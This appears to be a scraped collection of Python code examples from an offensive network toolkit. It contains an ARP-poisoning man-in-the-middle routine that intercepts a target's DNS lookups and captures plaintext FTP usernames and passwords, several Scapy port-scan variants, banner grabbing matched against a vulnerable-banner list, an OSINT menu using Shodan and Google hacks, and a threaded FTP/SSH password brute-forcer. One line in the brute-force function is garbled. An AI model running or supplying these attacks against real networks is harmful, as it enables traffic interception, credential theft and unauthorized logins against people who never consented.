def mitm_attack(network_iface, target_ip, gateway_ip, ports=None):

    global h_mac, t_ip, g_ip, t_mac, g_mac, continue_poison, domain_list, poison_thread, plain_ports
    h_mac = get_if_hwaddr(network_iface)
    t_ip = target_ip
    g_ip = gateway_ip
    g_mac = "not-valid"
    domain_list = {}
    continue_poison = True
    plain_ports = ports

    signal.signal(signal.SIGINT, _keyboard_interrupt_handler)

    menu_utils.header('Navigation eavesdropping attack, target IP: %s ' % target_ip)

    menu_utils.mixed_info("Network interface: ", network_iface)
    menu_utils.mixed_info("Gateway IP: ", gateway_ip)

    menu_utils.header("Stage 1: Poisoning ARP")

    t_mac = _get_mac(network_iface, t_ip, 10)
    if t_mac is None:
        menu_utils.warning("Unable to get target MAC address")
        return None
    else:
        menu_utils.mixed_info("Target MAC address: ", t_mac)

    g_mac = _get_mac(network_iface, g_ip, 10)
    if g_mac is None:
        menu_utils.warning("Unable to get gateway MAC address")
        return None
    else:
        menu_utils.mixed_info("Gateway MAC address: ", g_mac)

    menu_utils.highlighted_info("Enabling IP forwarding")
    # Enable IP Forwarding on a mac
    os.system("sysctl -w net.inet.ip.forwarding=1")

    # ARP poison thread
    poison_thread = threading.Thread(target=_arp_poison, args=(g_ip, g_mac, t_ip, t_mac))
    poison_thread.start()

    if not ports:
        # Sniff DNS traffic
        bpf_dns_filter = f"udp port 53 and ip src {target_ip}"
        menu_utils.header("Stage 2: Eavesdropping target DNS traffic")
        sniff(iface=network_iface, filter=bpf_dns_filter,
              prn=_target_dns_sniffer, stop_filter=_stop_dns_sniffer, store=0)

    else:
        # Sniff passwords
        bpf_ftp_filter = f"tcp port {plain_ports[0]} and (ip src {target_ip} or ip dst {target_ip})"
        menu_utils.header("Stage 2: Eavesdropping FTP plain passwords")
        sniff(iface=network_iface, filter=bpf_ftp_filter,
              prn=_target_passwd_sniffer, stop_filter=_stop_passwd_sniffer, store=0)

    signal.signal(signal.SIGINT, _main_keyboard_interrupt_handler)
def _target_passwd_sniffer(pkt):

    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        if pkt[TCP].dport == plain_ports[0] or pkt[TCP].sport == plain_ports[0]:
            data = str(pkt[Raw])
            if 'USER' in data and '530' not in data:
                ftp_user = data.split('USER')[1][:-5]   # [:-5] to remove \r\n' from the user
                print("%s -> %s: FTP user: %s" % (pkt[IP].src, pkt[IP].dst, ftp_user))
            elif 'PASS' in data and '530' not in data:
                ftp_pass = data.split('PASS')[1][:-5]   # [:-5] to remove \r\n' from the password
                print("%s -> %s: FTP pass: %s" % (pkt[IP].src, pkt[IP].dst, ftp_pass))
            elif '230 Login successful' in data:
                menu_utils.super_highlighted_info("%s -> %s: FTP login successful" % (pkt[IP].src, pkt[IP].dst))
            elif '530 Login incorrect' in data:
                menu_utils.warning("%s -> %s: FTP login incorrect" % (pkt[IP].src, pkt[IP].dst))
def scan(ip, ports):

    nm = nmap.PortScanner()
    nm.scan(ip, ports)

    if nm.all_hosts():
        menu_utils.header("NMAP SCAN, IP: %s " % ip)
        menu_utils.mixed_info("Scan info: ", nm.scaninfo())
        menu_utils.mixed_info("Command line: ", nm.command_line())
        menu_utils.mixed_info("All hosts: ", nm.all_hosts())
        menu_utils.highlighted_info("CSV file: ")
        menu_utils.conditional_highlighting(nm.csv(), "open", "closed")
        menu_utils.mixed_info("Location: ", dir(nm))

    else:
        menu_utils.warning("\nNO HOST FOUND IN IP %s" % ip)
Beispiel #4
0
def _ack_scan(ip, port):
    """ This method performs ACK scans """

    menu_utils.mixed_info("\nACK scan: Analysing port: ", str(port))
    response = sr1(IP(dst=ip) / TCP(dport=int(port), flags="A"),
                   timeout=config_params.SCAPY_TIMEOUT)  # Sending flag ACK
    print("Response type: " + str(type(response)))
    if str(type(response)) == "<class 'NoneType'>":
        menu_utils.warning("[-] Firewall found")
        return "FILTERED"
    elif response.haslayer(TCP):
        if response.getlayer(
                TCP).flags == 0x4:  # Receiving flag RST (00000100b)
            menu_utils.highlighted_info("[+] Firewall not found")
            return "UNFILTERED"
    elif response.haslayer(ICMP):  # Receiving ICMP error
        if (response.getlayer(ICMP).type == 3) & (int(
                response.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]):
            menu_utils.warning("[-] Firewall found")
            return "FILTERED"
    else:
        return "UNKNOWN"
Beispiel #5
0
def _null_scan(ip, port):
    """ This method performs NULL scans """

    menu_utils.mixed_info("\nNULL scan: Analysing port: ", str(port))
    response = sr1(IP(dst=ip) / TCP(dport=int(port), flags=""),
                   timeout=config_params.SCAPY_TIMEOUT)  # Sending no flags
    print("Response type: " + str(type(response)))
    if str(type(response)) == "<class 'NoneType'>":  # Receiving no answer
        menu_utils.highlighted_info("[?] Port %s open or filtered" % port)
        return "OPEN|FILTERED"
    elif response.haslayer(TCP):
        if response.getlayer(
                TCP).flags == 0x14:  # Receiving flags ACK + RST (00010100b)
            menu_utils.warning("[-] Port %s closed" % port)
            return "CLOSED"
    elif response.haslayer(ICMP):  # Receiving ICMP error
        if (response.getlayer(ICMP).type == 3) & (int(
                response.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]):
            menu_utils.warning("[x] Port %s filtered" % port)
            return "FILTERED"
    else:
        return "UNKNOWN"
Beispiel #6
0
def _tcp_scan(ip, port):
    """ This method performs TCP scans """

    menu_utils.mixed_info("\nTCP scan: Analysing port: ", str(port))
    response = sr1(IP(dst=ip) / TCP(dport=int(port), flags="S"),
                   timeout=config_params.SCAPY_TIMEOUT)  # Sending flag SYN
    print("Response type: " + str(type(response)))
    if str(type(response)) == "<class 'NoneType'>":
        menu_utils.warning("[-] Port %s closed" % port)
        return "CLOSED"
    elif response.haslayer(TCP):
        if response.getlayer(
                TCP).flags == 0x12:  # Receiving flags ACK + SYN (00010010b)
            menu_utils.super_highlighted_info("[+] Port %s open" % port)
            return "OPEN"
    elif response.haslayer(ICMP):
        if response.getlayer(TCP).flags == 0x14:
            menu_utils.warning("[-] Port %s closed" %
                               port)  # Receiving flags ACK + RST (00010100b)
            return "CLOSED"
    else:
        return "UNKNOWN"
def _banner_scan(ip, port):

    """ Method to obtain the banner corresponding to the port of the IP """

    category = ""
    banner = ""

    try:
        menu_utils.mixed_info("\nBanner grab: Analysing port: ", str(port))
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((ip, port))
        connection.setblocking(False)
        ready = select.select([connection], [], [], config_params.BANNER_TIMEOUT)

        if ready[0]:
            banner = connection.recv(4096)
            print("Banner: " + str(banner))
            f = open(config_params.VULNERABLE_BANNERS, 'r')
            category = "NON-VULNERABLE"
            for banner_vulnerable in f:
                if str(banner_vulnerable).strip() in str(banner).strip():
                    category = "VULNERABLE"
                    break
            if category == "VULNERABLE":
                menu_utils.super_highlighted_info('[+] The banner is vulnerable')
            else:
                menu_utils.highlighted_info('[?] The banner seems NOT vulnerable')
        else:
            menu_utils.warning('[-] The banner is not available')
            category = "UNAVAILABLE"

    except (ConnectionRefusedError, FileNotFoundError, TimeoutError) as e:
        menu_utils.error(e)
        category = "UNAVAILABLE"

    return category, banner
Beispiel #8
0
def _udp_scan(ip, port):
    """ This method performs UDP scans """

    menu_utils.mixed_info("\nUDP scan: Analysing port: ", str(port))
    response = sr1(IP(dst=ip) / UDP(dport=int(port)),
                   timeout=config_params.SCAPY_TIMEOUT)
    print("Response type: " + str(type(response)))
    if str(type(response)) == "<class 'NoneType'>":
        menu_utils.highlighted_info("[?] Port %s open or filtered" % port)
        return "OPEN|FILTERED"
    elif response.haslayer(UDP):
        menu_utils.super_highlighted_info("[+] Port % open" % port)
        return "OPEN"
    elif response.haslayer(ICMP):
        if (int(response.getlayer(ICMP).type)
                == 3) & (int(response.getlayer(ICMP).code == 3)):
            menu_utils.warning("[-] Port %s closed" % port)
            return "CLOSED"
        elif (int(response.getlayer(ICMP).type) == 3) & (int(
                response.getlayer(ICMP).code) in [1, 2, 9, 10, 13]):
            menu_utils.warning("[x] Port %s filtered" % port)
            return "FILTERED"
    else:
        return "UNKNOWN"
def menu():
    while 1:
        """ INFO COLLECTION MENU """
        option = menu_utils.nice_menu(
            'Select hacking tool',
            ['DNS', 'Whois', 'GeoIP', 'Google', 'Shodan', 'Metadata'])

        if (option < 1) | (option > 6):
            return

        elif option == 1:
            """ DNS submenu """
            while 1:
                sub_option = menu_utils.nice_menu('Select info retrieval mode',
                                                  ['Based on domain'])
                if sub_option == 1:
                    # Domain example: dragonjar.org
                    dns_info.from_domain(
                        menu_utils.highlighted_input('domain'))
                else:
                    break

        elif option == 2:
            """ WHOIS submenu """
            while 1:
                sub_option = menu_utils.nice_menu('Select info retrieval mode',
                                                  ['Based on domain'])
                if sub_option == 1:
                    # Domain example: dragonjar.org
                    whois_info.from_domain(
                        menu_utils.highlighted_input('domain'))
                else:
                    break

        elif option == 3:
            """ GEO submenu """
            while 1:
                sub_option = menu_utils.nice_menu(
                    "Select info retrieval mode",
                    ["Based on domain", "Based on IP"])
                if sub_option == 1:
                    # Domain example: dragonjar.org
                    geoip_info.from_domain(
                        menu_utils.highlighted_input('domain'))
                elif sub_option == 2:
                    # IP example: 104.27.161.40
                    geoip_info.from_ip(menu_utils.highlighted_input('IP'))
                else:
                    break

        elif option == 4:
            """ GOOGLE submenu """
            while 1:
                google_hacks = google_info.load_google_hacks_list()
                sub_option = menu_utils.nice_menu("Select a Google hack",
                                                  google_hacks)
                if (sub_option < 1) | (sub_option > len(google_hacks)):
                    break
                else:
                    google_info.from_site(menu_utils.highlighted_input('site'),
                                          google_hacks[sub_option - 1])
                break

        elif option == 5:
            """ SHODAN submenu """
            while 1:
                sub_option = menu_utils.nice_menu(
                    "Select info retrieval mode", [
                        "Based on Facets (global search)",
                        "Based on search string", "Based on IP"
                    ])
                if sub_option == 1:
                    # Domain example: nginx
                    search_str = menu_utils.highlighted_input(
                        'Shodan global search (based on facets)')
                    number_results = menu_utils.highlighted_input(
                        'number of TOP results')
                    facets_available = shodan_info.load_facets()
                    facets_list = list(facets_available.keys())
                    facets_list.insert(0, 'Your own search')
                    facets_list.append('All')
                    sub_sub_option = menu_utils.nice_menu(
                        "Select info (facet) to be retrieved", facets_list)
                    if (sub_sub_option < 1) | (sub_sub_option >
                                               len(facets_list)):
                        break
                    elif sub_sub_option == 1:
                        user_facet = menu_utils.highlighted_input(
                            'Shodan Facet')
                        facets = [(user_facet, number_results)]
                    elif (sub_sub_option > 1) & (sub_sub_option <=
                                                 len(facets_list) - 1):
                        facets = [(facets_list[sub_sub_option - 1],
                                   number_results)]
                    else:  # sub_sub_option == len(facets_list)
                        facets = []
                        for i in range(1, len(facets_list)):
                            facets.append((facets_list[i], number_results))
                    shodan_info.from_facets(search_str, facets)
                elif sub_option == 2:
                    # Domain example: apache
                    searches_available = shodan_info.load_searches()
                    if not searches_available:
                        menu_utils.warning(
                            "The file with search suggestions is empty")
                        searches_available = {}
                    searches_list = list(searches_available.values())
                    searches_list.insert(0, 'Your own search')
                    searches_list.append('Remove element from list')
                    sub_sub_option = menu_utils.nice_menu(
                        "Type of search", searches_list)
                    if (sub_sub_option < 1) | (sub_sub_option >
                                               len(searches_list)):
                        break
                    elif sub_sub_option == len(searches_list):
                        to_be_removed = int(
                            menu_utils.highlighted_input(
                                'element from the list to be removed'))
                        if (to_be_removed > 1) & (to_be_removed <
                                                  len(searches_list)):
                            del searches_available[list(
                                searches_available.keys())[to_be_removed - 2]]
                            shodan_info.update_searches(searches_available)
                        continue
                    elif sub_sub_option == 1:
                        search_str = menu_utils.highlighted_input(
                            'Shodan search (e.g. based on city, country, geo, '
                            'hostname, net, os, port)')
                        shodan_info.from_search(search_str)
                        to_be_saved = menu_utils.highlighted_input(
                            'search in the menu: (Y/n)')
                        if (to_be_saved.lower() == 'y') | (to_be_saved.lower()
                                                           == 'yes'):
                            description_str = menu_utils.highlighted_input(
                                'short description')
                            searches_available[search_str] = description_str
                            shodan_info.update_searches(searches_available)
                    elif sub_sub_option > 1:
                        search_str = list(searches_available)[sub_sub_option -
                                                              2]
                        shodan_info.from_search(search_str)
                elif sub_option == 3:
                    # IP example: 104.27.161.40
                    shodan_info.from_ip(menu_utils.highlighted_input('IP'))
                else:
                    break

        elif option == 6:
            """ METADATA submenu """
            while 1:
                sub_option = menu_utils.nice_menu(
                    "Select metadata retrieval mode",
                    ["From image", "From PDF"])
                if sub_option == 1:
                    # From image file
                    metadata_info.from_image(
                        menu_utils.highlighted_input('image file name'))
                elif sub_option == 2:
                    # From PDF file
                    metadata_info.from_pdf(
                        menu_utils.highlighted_input('PDF file name'))
                else:
                    break
Beispiel #10
0
def dictionary_attack(protocol, ip, port, interval, user, dictionary):

    if (protocol.lower() != 'ftp') & (protocol.lower() != 'ssh'):
        menu_utils.warning('Only "FTP" or "SSH" protocols are supported')
        return

    menu_utils.header('Brute force attack, target IP: %s ' % ip)
    menu_utils.mixed_info("Protocol:", protocol)
    menu_utils.mixed_info("Interval between attempts:",
                          "%s milliseconds" % interval)
    menu_utils.mixed_info("User:"******"Dictionary:", dictionary)

    counter = 0
    thread_list = []

    passwords = file_utils.load_file_as_list(dictionary)
    print("%s passwords in the dictionary" % len(passwords))
    menu_utils.highlighted_info("Progress:\n")

    my_queue = queue.Queue()

    if passwords:

        for passw in passwords:

            time.sleep(interval / 1000)
            counter += 1
            additional_info = "Trying pass: %s" % passw
            menu_utils.progress_bar(
                int(100 * counter / len(passwords)),
                config_params.DISPLAY["progress_bar_width"], additional_info)

            if protocol.lower() == 'ftp':
                t = threading.Thread(target=_ftp_connection_attempt,
                                     args=(
                                         ip,
                                         port,
                                         user,
                                         passw,
                                         my_queue,
                                     ))
            elif protocol.lower() == 'ssh':
                t = threading.Thread(target=_ssh_connection_attempt,
                                     args=(
                                         ip,
                                         port,
                                         user,
                                         passw,
                                         my_queue,
                                     ))

            t.start()
            thread_list.append(t)

            if counter % config_params.MAX_NUMBER_THREADS == 0:

                for thread in thread_list:
                    thread.join()  # closing threads
                thread_list = []
                if not my_queue.empty():  # the pass is stored in the queue
                    break

        for thread in thread_list:
            thread.join()  # closing threads

        if not my_queue.empty():  # the pass is stored in the queue
            menu_utils.super_highlighted_info("\n[+] Password found: %s" %
                                              my_queue.get())
        else:
            menu_utils.warning("\n[-] Password not found in %s " % dictionary)

    else:
        menu_utils.warning("\n[-] %s dictionary not found " % dictionary)